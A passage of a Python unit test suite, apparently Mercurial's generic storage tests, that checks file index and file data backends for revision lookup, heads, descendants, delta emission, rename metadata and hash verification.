122 122 with self.assertRaises(LookupError):
123 123 f.lookup(i)
124 124
125 125 self.assertEqual(f.linkrev(nullrev), nullrev)
126 126
127 127 for i in range(-5, 5):
128 128 if i == nullrev:
129 129 continue
130 130
131 131 with self.assertRaises(IndexError):
132 132 f.linkrev(i)
133 133
134 134 self.assertFalse(f.iscensored(nullrev))
135 135
136 136 for i in range(-5, 5):
137 137 if i == nullrev:
138 138 continue
139 139
140 140 with self.assertRaises(IndexError):
141 141 f.iscensored(i)
142 142
143 143 self.assertEqual(list(f.commonancestorsheads(nullid, nullid)), [])
144 144
145 145 with self.assertRaises(ValueError):
146 146 self.assertEqual(list(f.descendants([])), [])
147 147
148 148 self.assertEqual(list(f.descendants([nullrev])), [])
149 149
150 150 self.assertEqual(f.heads(), [nullid])
151 151 self.assertEqual(f.heads(nullid), [nullid])
152 152 self.assertEqual(f.heads(None, [nullid]), [nullid])
153 153 self.assertEqual(f.heads(nullid, [nullid]), [nullid])
154 154
155 155 self.assertEqual(f.children(nullid), [])
156 156
157 157 with self.assertRaises(error.LookupError):
158 158 f.children(b'\x01' * 20)
159 159
160 160 def testsinglerevision(self):
161 161 f = self._makefilefn()
162 162 with self._maketransactionfn() as tr:
163 163 node = f.add(b'initial', None, tr, 0, nullid, nullid)
164 164
165 165 self.assertEqual(len(f), 1)
166 166 self.assertEqual(list(f), [0])
167 167
168 168 gen = iter(f)
169 169 self.assertEqual(next(gen), 0)
170 170
171 171 with self.assertRaises(StopIteration):
172 172 next(gen)
173 173
174 174 self.assertTrue(f.hasnode(node))
175 175 self.assertFalse(f.hasnode(hex(node)))
176 176 self.assertFalse(f.hasnode(nullrev))
177 177 self.assertFalse(f.hasnode(nullid))
178 178 self.assertFalse(f.hasnode(node[0:12]))
179 179 self.assertFalse(f.hasnode(hex(node)[0:20]))
180 180
181 181 self.assertEqual(list(f.revs()), [0])
182 182 self.assertEqual(list(f.revs(start=1)), [])
183 183 self.assertEqual(list(f.revs(start=0)), [0])
184 184 self.assertEqual(list(f.revs(stop=0)), [0])
185 185 self.assertEqual(list(f.revs(stop=1)), [0])
186 186 self.assertEqual(list(f.revs(1, 1)), [])
187 187 # TODO buggy
188 188 self.assertEqual(list(f.revs(1, 0)), [1, 0])
189 189 self.assertEqual(list(f.revs(2, 0)), [2, 1, 0])
190 190
191 191 self.assertEqual(f.parents(node), (nullid, nullid))
192 192 self.assertEqual(f.parentrevs(0), (nullrev, nullrev))
193 193
194 194 with self.assertRaises(error.LookupError):
195 195 f.parents(b'\x01' * 20)
196 196
197 197 with self.assertRaises(IndexError):
198 198 f.parentrevs(1)
199 199
200 200 self.assertEqual(f.rev(node), 0)
201 201
202 202 with self.assertRaises(error.LookupError):
203 203 f.rev(b'\x01' * 20)
204 204
205 205 self.assertEqual(f.node(0), node)
206 206
207 207 with self.assertRaises(IndexError):
208 208 f.node(1)
209 209
210 210 self.assertEqual(f.lookup(node), node)
211 211 self.assertEqual(f.lookup(0), node)
212 212 self.assertEqual(f.lookup(-1), nullid)
213 213 self.assertEqual(f.lookup(b'0'), node)
214 214 self.assertEqual(f.lookup(hex(node)), node)
215 215
216 216 with self.assertRaises(error.LookupError):
217 217 f.lookup(hex(node)[0:12])
218 218
219 219 with self.assertRaises(error.LookupError):
220 220 f.lookup(-2)
221 221
222 222 with self.assertRaises(error.LookupError):
223 223 f.lookup(b'-2')
224 224
225 225 with self.assertRaises(error.LookupError):
226 226 f.lookup(1)
227 227
228 228 with self.assertRaises(error.LookupError):
229 229 f.lookup(b'1')
230 230
231 231 self.assertEqual(f.linkrev(0), 0)
232 232
233 233 with self.assertRaises(IndexError):
234 234 f.linkrev(1)
235 235
236 236 self.assertFalse(f.iscensored(0))
237 237
238 238 with self.assertRaises(IndexError):
239 239 f.iscensored(1)
240 240
241 241 self.assertEqual(list(f.descendants([0])), [])
242 242
243 243 self.assertEqual(f.heads(), [node])
244 244 self.assertEqual(f.heads(node), [node])
245 245 self.assertEqual(f.heads(stop=[node]), [node])
246 246
247 247 with self.assertRaises(error.LookupError):
248 248 f.heads(stop=[b'\x01' * 20])
249 249
250 250 self.assertEqual(f.children(node), [])
251 251
252 252 def testmultiplerevisions(self):
253 253 fulltext0 = b'x' * 1024
254 254 fulltext1 = fulltext0 + b'y'
255 255 fulltext2 = b'y' + fulltext0 + b'z'
256 256
257 257 f = self._makefilefn()
258 258 with self._maketransactionfn() as tr:
259 259 node0 = f.add(fulltext0, None, tr, 0, nullid, nullid)
260 260 node1 = f.add(fulltext1, None, tr, 1, node0, nullid)
261 261 node2 = f.add(fulltext2, None, tr, 3, node1, nullid)
262 262
263 263 self.assertEqual(len(f), 3)
264 264 self.assertEqual(list(f), [0, 1, 2])
265 265
266 266 gen = iter(f)
267 267 self.assertEqual(next(gen), 0)
268 268 self.assertEqual(next(gen), 1)
269 269 self.assertEqual(next(gen), 2)
270 270
271 271 with self.assertRaises(StopIteration):
272 272 next(gen)
273 273
274 274 self.assertEqual(list(f.revs()), [0, 1, 2])
275 275 self.assertEqual(list(f.revs(0)), [0, 1, 2])
276 276 self.assertEqual(list(f.revs(1)), [1, 2])
277 277 self.assertEqual(list(f.revs(2)), [2])
278 278 self.assertEqual(list(f.revs(3)), [])
279 279 self.assertEqual(list(f.revs(stop=1)), [0, 1])
280 280 self.assertEqual(list(f.revs(stop=2)), [0, 1, 2])
281 281 self.assertEqual(list(f.revs(stop=3)), [0, 1, 2])
282 282 self.assertEqual(list(f.revs(2, 0)), [2, 1, 0])
283 283 self.assertEqual(list(f.revs(2, 1)), [2, 1])
284 284 # TODO this is wrong
285 285 self.assertEqual(list(f.revs(3, 2)), [3, 2])
286 286
287 287 self.assertEqual(f.parents(node0), (nullid, nullid))
288 288 self.assertEqual(f.parents(node1), (node0, nullid))
289 289 self.assertEqual(f.parents(node2), (node1, nullid))
290 290
291 291 self.assertEqual(f.parentrevs(0), (nullrev, nullrev))
292 292 self.assertEqual(f.parentrevs(1), (0, nullrev))
293 293 self.assertEqual(f.parentrevs(2), (1, nullrev))
294 294
295 295 self.assertEqual(f.rev(node0), 0)
296 296 self.assertEqual(f.rev(node1), 1)
297 297 self.assertEqual(f.rev(node2), 2)
298 298
299 299 with self.assertRaises(error.LookupError):
300 300 f.rev(b'\x01' * 20)
301 301
302 302 self.assertEqual(f.node(0), node0)
303 303 self.assertEqual(f.node(1), node1)
304 304 self.assertEqual(f.node(2), node2)
305 305
306 306 with self.assertRaises(IndexError):
307 307 f.node(3)
308 308
309 309 self.assertEqual(f.lookup(node0), node0)
310 310 self.assertEqual(f.lookup(0), node0)
311 311 self.assertEqual(f.lookup(b'0'), node0)
312 312 self.assertEqual(f.lookup(hex(node0)), node0)
313 313
314 314 self.assertEqual(f.lookup(node1), node1)
315 315 self.assertEqual(f.lookup(1), node1)
316 316 self.assertEqual(f.lookup(b'1'), node1)
317 317 self.assertEqual(f.lookup(hex(node1)), node1)
318 318
319 319 self.assertEqual(f.linkrev(0), 0)
320 320 self.assertEqual(f.linkrev(1), 1)
321 321 self.assertEqual(f.linkrev(2), 3)
322 322
323 323 with self.assertRaises(IndexError):
324 324 f.linkrev(3)
325 325
326 326 self.assertFalse(f.iscensored(0))
327 327 self.assertFalse(f.iscensored(1))
328 328 self.assertFalse(f.iscensored(2))
329 329
330 330 with self.assertRaises(IndexError):
331 331 f.iscensored(3)
332 332
333 333 self.assertEqual(f.commonancestorsheads(node1, nullid), [])
334 334 self.assertEqual(f.commonancestorsheads(node1, node0), [node0])
335 335 self.assertEqual(f.commonancestorsheads(node1, node1), [node1])
336 336 self.assertEqual(f.commonancestorsheads(node0, node1), [node0])
337 337 self.assertEqual(f.commonancestorsheads(node1, node2), [node1])
338 338 self.assertEqual(f.commonancestorsheads(node2, node1), [node1])
339 339
340 340 self.assertEqual(list(f.descendants([0])), [1, 2])
341 341 self.assertEqual(list(f.descendants([1])), [2])
342 342 self.assertEqual(list(f.descendants([0, 1])), [1, 2])
343 343
344 344 self.assertEqual(f.heads(), [node2])
345 345 self.assertEqual(f.heads(node0), [node2])
346 346 self.assertEqual(f.heads(node1), [node2])
347 347 self.assertEqual(f.heads(node2), [node2])
348 348
349 349 # TODO this behavior seems wonky. Is it correct? If so, the
350 350 # docstring for heads() should be updated to reflect desired
351 351 # behavior.
352 352 self.assertEqual(f.heads(stop=[node1]), [node1, node2])
353 353 self.assertEqual(f.heads(stop=[node0]), [node0, node2])
354 354 self.assertEqual(f.heads(stop=[node1, node2]), [node1, node2])
355 355
356 356 with self.assertRaises(error.LookupError):
357 357 f.heads(stop=[b'\x01' * 20])
358 358
359 359 self.assertEqual(f.children(node0), [node1])
360 360 self.assertEqual(f.children(node1), [node2])
361 361 self.assertEqual(f.children(node2), [])
362 362
363 363 def testmultipleheads(self):
364 364 f = self._makefilefn()
365 365
366 366 with self._maketransactionfn() as tr:
367 367 node0 = f.add(b'0', None, tr, 0, nullid, nullid)
368 368 node1 = f.add(b'1', None, tr, 1, node0, nullid)
369 369 node2 = f.add(b'2', None, tr, 2, node1, nullid)
370 370 node3 = f.add(b'3', None, tr, 3, node0, nullid)
371 371 node4 = f.add(b'4', None, tr, 4, node3, nullid)
372 372 node5 = f.add(b'5', None, tr, 5, node0, nullid)
373 373
374 374 self.assertEqual(len(f), 6)
375 375
376 376 self.assertEqual(list(f.descendants([0])), [1, 2, 3, 4, 5])
377 377 self.assertEqual(list(f.descendants([1])), [2])
378 378 self.assertEqual(list(f.descendants([2])), [])
379 379 self.assertEqual(list(f.descendants([3])), [4])
380 380 self.assertEqual(list(f.descendants([0, 1])), [1, 2, 3, 4, 5])
381 381 self.assertEqual(list(f.descendants([1, 3])), [2, 4])
382 382
383 383 self.assertEqual(f.heads(), [node2, node4, node5])
384 384 self.assertEqual(f.heads(node0), [node2, node4, node5])
385 385 self.assertEqual(f.heads(node1), [node2])
386 386 self.assertEqual(f.heads(node2), [node2])
387 387 self.assertEqual(f.heads(node3), [node4])
388 388 self.assertEqual(f.heads(node4), [node4])
389 389 self.assertEqual(f.heads(node5), [node5])
390 390
391 391 # TODO this seems wrong.
392 392 self.assertEqual(f.heads(stop=[node0]), [node0, node2, node4, node5])
393 393 self.assertEqual(f.heads(stop=[node1]), [node1, node2, node4, node5])
394 394
395 395 self.assertEqual(f.children(node0), [node1, node3, node5])
396 396 self.assertEqual(f.children(node1), [node2])
397 397 self.assertEqual(f.children(node2), [])
398 398 self.assertEqual(f.children(node3), [node4])
399 399 self.assertEqual(f.children(node4), [])
400 400 self.assertEqual(f.children(node5), [])
401 401
402 402
403 403 class ifiledatatests(basetestcase):
404 404 """Generic tests for the ifiledata interface.
405 405
406 406 All file storage backends for data should conform to the tests in this
407 407 class.
408 408
409 409 Use ``makeifiledatatests()`` to create an instance of this type.
410 410 """
411 411
412 412 def testempty(self):
413 413 f = self._makefilefn()
414 414
415 415 self.assertEqual(f.storageinfo(), {})
416 416 self.assertEqual(
417 417 f.storageinfo(revisionscount=True, trackedsize=True),
418 418 {b'revisionscount': 0, b'trackedsize': 0},
419 419 )
420 420
421 421 self.assertEqual(f.size(nullrev), 0)
422 422
423 423 for i in range(-5, 5):
424 424 if i == nullrev:
425 425 continue
426 426
427 427 with self.assertRaises(IndexError):
428 428 f.size(i)
429 429
430 430 self.assertEqual(f.revision(nullid), b'')
431 431 self.assertEqual(f.rawdata(nullid), b'')
432 432
433 433 with self.assertRaises(error.LookupError):
434 434 f.revision(b'\x01' * 20)
435 435
436 436 self.assertEqual(f.read(nullid), b'')
437 437
438 438 with self.assertRaises(error.LookupError):
439 439 f.read(b'\x01' * 20)
440 440
441 441 self.assertFalse(f.renamed(nullid))
442 442
443 443 with self.assertRaises(error.LookupError):
444 444 f.read(b'\x01' * 20)
445 445
446 446 self.assertTrue(f.cmp(nullid, b''))
447 447 self.assertTrue(f.cmp(nullid, b'foo'))
448 448
449 449 with self.assertRaises(error.LookupError):
450 450 f.cmp(b'\x01' * 20, b'irrelevant')
451 451
452 452 # Emitting an empty list produces an empty generator.
453 453 gen = f.emitrevisions([])
454 454 with self.assertRaises(StopIteration):
455 455 next(gen)
456 456
457 457 # Emitting null node yields nothing.
458 458 gen = f.emitrevisions([nullid])
459 459 with self.assertRaises(StopIteration):
460 460 next(gen)
461 461
462 462 # Requesting unknown node fails.
463 463 with self.assertRaises(error.LookupError):
464 464 list(f.emitrevisions([b'\x01' * 20]))
465 465
466 466 def testsinglerevision(self):
467 467 fulltext = b'initial'
468 468
469 469 f = self._makefilefn()
470 470 with self._maketransactionfn() as tr:
471 471 node = f.add(fulltext, None, tr, 0, nullid, nullid)
472 472
473 473 self.assertEqual(f.storageinfo(), {})
474 474 self.assertEqual(
475 475 f.storageinfo(revisionscount=True, trackedsize=True),
476 476 {b'revisionscount': 1, b'trackedsize': len(fulltext)},
477 477 )
478 478
479 479 self.assertEqual(f.size(0), len(fulltext))
480 480
481 481 with self.assertRaises(IndexError):
482 482 f.size(1)
483 483
484 484 self.assertEqual(f.revision(node), fulltext)
485 485 self.assertEqual(f.rawdata(node), fulltext)
486 486
487 487 self.assertEqual(f.read(node), fulltext)
488 488
489 489 self.assertFalse(f.renamed(node))
490 490
491 491 self.assertFalse(f.cmp(node, fulltext))
492 492 self.assertTrue(f.cmp(node, fulltext + b'extra'))
493 493
494 494 # Emitting a single revision works.
495 495 gen = f.emitrevisions([node])
496 496 rev = next(gen)
497 497
498 498 self.assertEqual(rev.node, node)
499 499 self.assertEqual(rev.p1node, nullid)
500 500 self.assertEqual(rev.p2node, nullid)
501 501 self.assertIsNone(rev.linknode)
502 502 self.assertEqual(rev.basenode, nullid)
503 503 self.assertIsNone(rev.baserevisionsize)
504 504 self.assertIsNone(rev.revision)
505 505 self.assertIsNone(rev.delta)
506 506
507 507 with self.assertRaises(StopIteration):
508 508 next(gen)
509 509
510 510 # Requesting revision data works.
511 511 gen = f.emitrevisions([node], revisiondata=True)
512 512 rev = next(gen)
513 513
514 514 self.assertEqual(rev.node, node)
515 515 self.assertEqual(rev.p1node, nullid)
516 516 self.assertEqual(rev.p2node, nullid)
517 517 self.assertIsNone(rev.linknode)
518 518 self.assertEqual(rev.basenode, nullid)
519 519 self.assertIsNone(rev.baserevisionsize)
520 520 self.assertEqual(rev.revision, fulltext)
521 521 self.assertIsNone(rev.delta)
522 522
523 523 with self.assertRaises(StopIteration):
524 524 next(gen)
525 525
526 526 # Emitting an unknown node after a known revision results in error.
527 527 with self.assertRaises(error.LookupError):
528 528 list(f.emitrevisions([node, b'\x01' * 20]))
529 529
530 530 def testmultiplerevisions(self):
531 531 fulltext0 = b'x' * 1024
532 532 fulltext1 = fulltext0 + b'y'
533 533 fulltext2 = b'y' + fulltext0 + b'z'
534 534
535 535 f = self._makefilefn()
536 536 with self._maketransactionfn() as tr:
537 537 node0 = f.add(fulltext0, None, tr, 0, nullid, nullid)
538 538 node1 = f.add(fulltext1, None, tr, 1, node0, nullid)
539 539 node2 = f.add(fulltext2, None, tr, 3, node1, nullid)
540 540
541 541 self.assertEqual(f.storageinfo(), {})
542 542 self.assertEqual(
543 543 f.storageinfo(revisionscount=True, trackedsize=True),
544 544 {
545 545 b'revisionscount': 3,
546 546 b'trackedsize': len(fulltext0)
547 547 + len(fulltext1)
548 548 + len(fulltext2),
549 549 },
550 550 )
551 551
552 552 self.assertEqual(f.size(0), len(fulltext0))
553 553 self.assertEqual(f.size(1), len(fulltext1))
554 554 self.assertEqual(f.size(2), len(fulltext2))
555 555
556 556 with self.assertRaises(IndexError):
557 557 f.size(3)
558 558
559 559 self.assertEqual(f.revision(node0), fulltext0)
560 560 self.assertEqual(f.rawdata(node0), fulltext0)
561 561 self.assertEqual(f.revision(node1), fulltext1)
562 562 self.assertEqual(f.rawdata(node1), fulltext1)
563 563 self.assertEqual(f.revision(node2), fulltext2)
564 564 self.assertEqual(f.rawdata(node2), fulltext2)
565 565
566 566 with self.assertRaises(error.LookupError):
567 567 f.revision(b'\x01' * 20)
568 568
569 569 self.assertEqual(f.read(node0), fulltext0)
570 570 self.assertEqual(f.read(node1), fulltext1)
571 571 self.assertEqual(f.read(node2), fulltext2)
572 572
573 573 with self.assertRaises(error.LookupError):
574 574 f.read(b'\x01' * 20)
575 575
576 576 self.assertFalse(f.renamed(node0))
577 577 self.assertFalse(f.renamed(node1))
578 578 self.assertFalse(f.renamed(node2))
579 579
580 580 with self.assertRaises(error.LookupError):
581 581 f.renamed(b'\x01' * 20)
582 582
583 583 self.assertFalse(f.cmp(node0, fulltext0))
584 584 self.assertFalse(f.cmp(node1, fulltext1))
585 585 self.assertFalse(f.cmp(node2, fulltext2))
586 586
587 587 self.assertTrue(f.cmp(node1, fulltext0))
588 588 self.assertTrue(f.cmp(node2, fulltext1))
589 589
590 590 with self.assertRaises(error.LookupError):
591 591 f.cmp(b'\x01' * 20, b'irrelevant')
592 592
593 593 # Nodes should be emitted in order.
594 594 gen = f.emitrevisions([node0, node1, node2], revisiondata=True)
595 595
596 596 rev = next(gen)
597 597
598 598 self.assertEqual(rev.node, node0)
599 599 self.assertEqual(rev.p1node, nullid)
600 600 self.assertEqual(rev.p2node, nullid)
601 601 self.assertIsNone(rev.linknode)
602 602 self.assertEqual(rev.basenode, nullid)
603 603 self.assertIsNone(rev.baserevisionsize)
604 604 self.assertEqual(rev.revision, fulltext0)
605 605 self.assertIsNone(rev.delta)
606 606
607 607 rev = next(gen)
608 608
609 609 self.assertEqual(rev.node, node1)
610 610 self.assertEqual(rev.p1node, node0)
611 611 self.assertEqual(rev.p2node, nullid)
612 612 self.assertIsNone(rev.linknode)
613 613 self.assertEqual(rev.basenode, node0)
614 614 self.assertIsNone(rev.baserevisionsize)
615 615 self.assertIsNone(rev.revision)
616 616 self.assertEqual(
617 617 rev.delta,
618 618 b'\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x01' + fulltext1,
619 619 )
620 620
621 621 rev = next(gen)
622 622
623 623 self.assertEqual(rev.node, node2)
624 624 self.assertEqual(rev.p1node, node1)
625 625 self.assertEqual(rev.p2node, nullid)
626 626 self.assertIsNone(rev.linknode)
627 627 self.assertEqual(rev.basenode, node1)
628 628 self.assertIsNone(rev.baserevisionsize)
629 629 self.assertIsNone(rev.revision)
630 630 self.assertEqual(
631 631 rev.delta,
632 632 b'\x00\x00\x00\x00\x00\x00\x04\x01\x00\x00\x04\x02' + fulltext2,
633 633 )
634 634
635 635 with self.assertRaises(StopIteration):
636 636 next(gen)
637 637
638 638 # Request not in DAG order is reordered to be in DAG order.
639 639 gen = f.emitrevisions([node2, node1, node0], revisiondata=True)
640 640
641 641 rev = next(gen)
642 642
643 643 self.assertEqual(rev.node, node0)
644 644 self.assertEqual(rev.p1node, nullid)
645 645 self.assertEqual(rev.p2node, nullid)
646 646 self.assertIsNone(rev.linknode)
647 647 self.assertEqual(rev.basenode, nullid)
648 648 self.assertIsNone(rev.baserevisionsize)
649 649 self.assertEqual(rev.revision, fulltext0)
650 650 self.assertIsNone(rev.delta)
651 651
652 652 rev = next(gen)
653 653
654 654 self.assertEqual(rev.node, node1)
655 655 self.assertEqual(rev.p1node, node0)
656 656 self.assertEqual(rev.p2node, nullid)
657 657 self.assertIsNone(rev.linknode)
658 658 self.assertEqual(rev.basenode, node0)
659 659 self.assertIsNone(rev.baserevisionsize)
660 660 self.assertIsNone(rev.revision)
661 661 self.assertEqual(
662 662 rev.delta,
663 663 b'\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x01' + fulltext1,
664 664 )
665 665
666 666 rev = next(gen)
667 667
668 668 self.assertEqual(rev.node, node2)
669 669 self.assertEqual(rev.p1node, node1)
670 670 self.assertEqual(rev.p2node, nullid)
671 671 self.assertIsNone(rev.linknode)
672 672 self.assertEqual(rev.basenode, node1)
673 673 self.assertIsNone(rev.baserevisionsize)
674 674 self.assertIsNone(rev.revision)
675 675 self.assertEqual(
676 676 rev.delta,
677 677 b'\x00\x00\x00\x00\x00\x00\x04\x01\x00\x00\x04\x02' + fulltext2,
678 678 )
679 679
680 680 with self.assertRaises(StopIteration):
681 681 next(gen)
682 682
683 683 # Unrecognized nodesorder value raises ProgrammingError.
684 684 with self.assertRaises(error.ProgrammingError):
685 685 list(f.emitrevisions([], nodesorder=b'bad'))
686 686
687 687 # nodesorder=storage is recognized. But we can't test it thoroughly
688 688 # because behavior is storage-dependent.
689 689 res = list(
690 690 f.emitrevisions([node2, node1, node0], nodesorder=b'storage')
691 691 )
692 692 self.assertEqual(len(res), 3)
693 693 self.assertEqual({o.node for o in res}, {node0, node1, node2})
694 694
695 695 # nodesorder=nodes forces the order.
696 696 gen = f.emitrevisions(
697 697 [node2, node0], nodesorder=b'nodes', revisiondata=True
698 698 )
699 699
700 700 rev = next(gen)
701 701 self.assertEqual(rev.node, node2)
702 702 self.assertEqual(rev.p1node, node1)
703 703 self.assertEqual(rev.p2node, nullid)
704 704 self.assertEqual(rev.basenode, nullid)
705 705 self.assertIsNone(rev.baserevisionsize)
706 706 self.assertEqual(rev.revision, fulltext2)
707 707 self.assertIsNone(rev.delta)
708 708
709 709 rev = next(gen)
710 710 self.assertEqual(rev.node, node0)
711 711 self.assertEqual(rev.p1node, nullid)
712 712 self.assertEqual(rev.p2node, nullid)
713 713 # Delta behavior is storage dependent, so we can't easily test it.
714 714
715 715 with self.assertRaises(StopIteration):
716 716 next(gen)
717 717
718 718 # assumehaveparentrevisions=False (the default) won't send a delta for
719 719 # the first revision.
720 720 gen = f.emitrevisions({node2, node1}, revisiondata=True)
721 721
722 722 rev = next(gen)
723 723 self.assertEqual(rev.node, node1)
724 724 self.assertEqual(rev.p1node, node0)
725 725 self.assertEqual(rev.p2node, nullid)
726 726 self.assertEqual(rev.basenode, nullid)
727 727 self.assertIsNone(rev.baserevisionsize)
728 728 self.assertEqual(rev.revision, fulltext1)
729 729 self.assertIsNone(rev.delta)
730 730
731 731 rev = next(gen)
732 732 self.assertEqual(rev.node, node2)
733 733 self.assertEqual(rev.p1node, node1)
734 734 self.assertEqual(rev.p2node, nullid)
735 735 self.assertEqual(rev.basenode, node1)
736 736 self.assertIsNone(rev.baserevisionsize)
737 737 self.assertIsNone(rev.revision)
738 738 self.assertEqual(
739 739 rev.delta,
740 740 b'\x00\x00\x00\x00\x00\x00\x04\x01\x00\x00\x04\x02' + fulltext2,
741 741 )
742 742
743 743 with self.assertRaises(StopIteration):
744 744 next(gen)
745 745
746 746 # assumehaveparentrevisions=True allows delta against initial revision.
747 747 gen = f.emitrevisions(
748 748 [node2, node1], revisiondata=True, assumehaveparentrevisions=True
749 749 )
750 750
751 751 rev = next(gen)
752 752 self.assertEqual(rev.node, node1)
753 753 self.assertEqual(rev.p1node, node0)
754 754 self.assertEqual(rev.p2node, nullid)
755 755 self.assertEqual(rev.basenode, node0)
756 756 self.assertIsNone(rev.baserevisionsize)
757 757 self.assertIsNone(rev.revision)
758 758 self.assertEqual(
759 759 rev.delta,
760 760 b'\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x01' + fulltext1,
761 761 )
762 762
763 763 # deltamode=CG_DELTAMODE_PREV forces a delta against the previous
764 764 # revision. Special case for the initial revision.
765 765 gen = f.emitrevisions(
766 766 [node0], revisiondata=True, deltamode=repository.CG_DELTAMODE_PREV
767 767 )
768 768
769 769 rev = next(gen)
770 770 self.assertEqual(rev.node, node0)
771 771 self.assertEqual(rev.p1node, nullid)
772 772 self.assertEqual(rev.p2node, nullid)
773 773 self.assertEqual(rev.basenode, nullid)
774 774 self.assertIsNone(rev.baserevisionsize)
775 775 self.assertIsNone(rev.revision)
776 776 self.assertEqual(
777 777 rev.delta,
778 778 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00' + fulltext0,
779 779 )
780 780
781 781 with self.assertRaises(StopIteration):
782 782 next(gen)
783 783
784 784 gen = f.emitrevisions(
785 785 [node0, node2],
786 786 revisiondata=True,
787 787 deltamode=repository.CG_DELTAMODE_PREV,
788 788 )
789 789
790 790 rev = next(gen)
791 791 self.assertEqual(rev.node, node0)
792 792 self.assertEqual(rev.p1node, nullid)
793 793 self.assertEqual(rev.p2node, nullid)
794 794 self.assertEqual(rev.basenode, nullid)
795 795 self.assertIsNone(rev.baserevisionsize)
796 796 self.assertIsNone(rev.revision)
797 797 self.assertEqual(
798 798 rev.delta,
799 799 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00' + fulltext0,
800 800 )
801 801
802 802 rev = next(gen)
803 803 self.assertEqual(rev.node, node2)
804 804 self.assertEqual(rev.p1node, node1)
805 805 self.assertEqual(rev.p2node, nullid)
806 806 self.assertEqual(rev.basenode, node0)
807 807
808 808 with self.assertRaises(StopIteration):
809 809 next(gen)
810 810
811 811 def testrenamed(self):
812 812 fulltext0 = b'foo'
813 813 fulltext1 = b'bar'
814 814 fulltext2 = b'baz'
815 815
816 816 meta1 = {
817 817 b'copy': b'source0',
818 818 b'copyrev': b'a' * 40,
819 819 }
820 820
821 821 meta2 = {
822 822 b'copy': b'source1',
823 823 b'copyrev': b'b' * 40,
824 824 }
825 825
826 826 stored1 = b''.join(
827 827 [
828 828 b'\x01\ncopy: source0\n',
829 829 b'copyrev: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\n\x01\n',
830 830 fulltext1,
831 831 ]
832 832 )
833 833
834 834 stored2 = b''.join(
835 835 [
836 836 b'\x01\ncopy: source1\n',
837 837 b'copyrev: bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb\n\x01\n',
838 838 fulltext2,
839 839 ]
840 840 )
841 841
842 842 f = self._makefilefn()
843 843 with self._maketransactionfn() as tr:
844 844 node0 = f.add(fulltext0, None, tr, 0, nullid, nullid)
845 845 node1 = f.add(fulltext1, meta1, tr, 1, node0, nullid)
846 846 node2 = f.add(fulltext2, meta2, tr, 2, nullid, nullid)
847 847
848 848 # Metadata header isn't recognized when parent isn't nullid.
849 849 self.assertEqual(f.size(1), len(stored1))
850 850 self.assertEqual(f.size(2), len(fulltext2))
851 851
852 852 self.assertEqual(f.revision(node1), stored1)
853 853 self.assertEqual(f.rawdata(node1), stored1)
854 854 self.assertEqual(f.revision(node2), stored2)
855 855 self.assertEqual(f.rawdata(node2), stored2)
856 856
857 857 self.assertEqual(f.read(node1), fulltext1)
858 858 self.assertEqual(f.read(node2), fulltext2)
859 859
860 860 # Returns False when first parent is set.
861 861 self.assertFalse(f.renamed(node1))
862 862 self.assertEqual(f.renamed(node2), (b'source1', b'\xbb' * 20))
863 863
864 864 self.assertTrue(f.cmp(node1, fulltext1))
865 865 self.assertTrue(f.cmp(node1, stored1))
866 866 self.assertFalse(f.cmp(node2, fulltext2))
867 867 self.assertTrue(f.cmp(node2, stored2))
868 868
869 869 def testmetadataprefix(self):
870 870 # Content with metadata prefix has extra prefix inserted in storage.
871 871 fulltext0 = b'\x01\nfoo'
872 872 stored0 = b'\x01\n\x01\n\x01\nfoo'
873 873
874 874 fulltext1 = b'\x01\nbar'
875 875 meta1 = {
876 876 b'copy': b'source0',
877 877 b'copyrev': b'b' * 40,
878 878 }
879 879 stored1 = b''.join(
880 880 [
881 881 b'\x01\ncopy: source0\n',
882 882 b'copyrev: %s\n' % (b'b' * 40),
883 883 b'\x01\n\x01\nbar',
884 884 ]
885 885 )
886 886
887 887 f = self._makefilefn()
888 888 with self._maketransactionfn() as tr:
889 889 node0 = f.add(fulltext0, {}, tr, 0, nullid, nullid)
890 890 node1 = f.add(fulltext1, meta1, tr, 1, nullid, nullid)
891 891
892 892 # TODO this is buggy.
893 893 self.assertEqual(f.size(0), len(fulltext0) + 4)
894 894
895 895 self.assertEqual(f.size(1), len(fulltext1))
896 896
897 897 self.assertEqual(f.revision(node0), stored0)
898 898 self.assertEqual(f.rawdata(node0), stored0)
899 899
900 900 self.assertEqual(f.revision(node1), stored1)
901 901 self.assertEqual(f.rawdata(node1), stored1)
902 902
903 903 self.assertEqual(f.read(node0), fulltext0)
904 904 self.assertEqual(f.read(node1), fulltext1)
905 905
906 906 self.assertFalse(f.cmp(node0, fulltext0))
907 907 self.assertTrue(f.cmp(node0, stored0))
908 908
909 909 self.assertFalse(f.cmp(node1, fulltext1))
910 910 self.assertTrue(f.cmp(node1, stored0))
911 911
912 912 def testbadnoderead(self):
913 913 f = self._makefilefn()
914 914
915 915 fulltext0 = b'foo\n' * 30
916 916 fulltext1 = fulltext0 + b'bar\n'
917 917
918 918 with self._maketransactionfn() as tr:
919 919 node0 = f.add(fulltext0, None, tr, 0, nullid, nullid)
920 920 node1 = b'\xaa' * 20
921 921
922 922 self._addrawrevisionfn(
923 923 f, tr, node1, node0, nullid, 1, rawtext=fulltext1
924 924 )
925 925
926 926 self.assertEqual(len(f), 2)
927 927 self.assertEqual(f.parents(node1), (node0, nullid))
928 928
929 929 # revision() raises since it performs hash verification.
930 930 with self.assertRaises(error.StorageError):
931 931 f.revision(node1)
932 932
933 933 # rawdata() still verifies because there are no special storage
934 934 # settings.
935 935 with self.assertRaises(error.StorageError):
936 936 f.rawdata(node1)
937 937
938 938 # read() behaves like revision().
939 939 with self.assertRaises(error.StorageError):
940 940 f.read(node1)
941 941
942 942 # We can't test renamed() here because some backends may not require
943 943 # reading/validating the fulltext to return rename metadata.
944 944
945 945 def testbadnoderevisionraw(self):
946 946 # Like above except we test rawdata() first to isolate
947 947 # revision caching behavior.
948 948 f = self._makefilefn()
949 949
950 950 fulltext0 = b'foo\n' * 30
951 951 fulltext1 = fulltext0 + b'bar\n'
952 952
953 953 with self._maketransactionfn() as tr:
954 954 node0 = f.add(fulltext0, None, tr, 0, nullid, nullid)
955 955 node1 = b'\xaa' * 20
956 956
957 957 self._addrawrevisionfn(
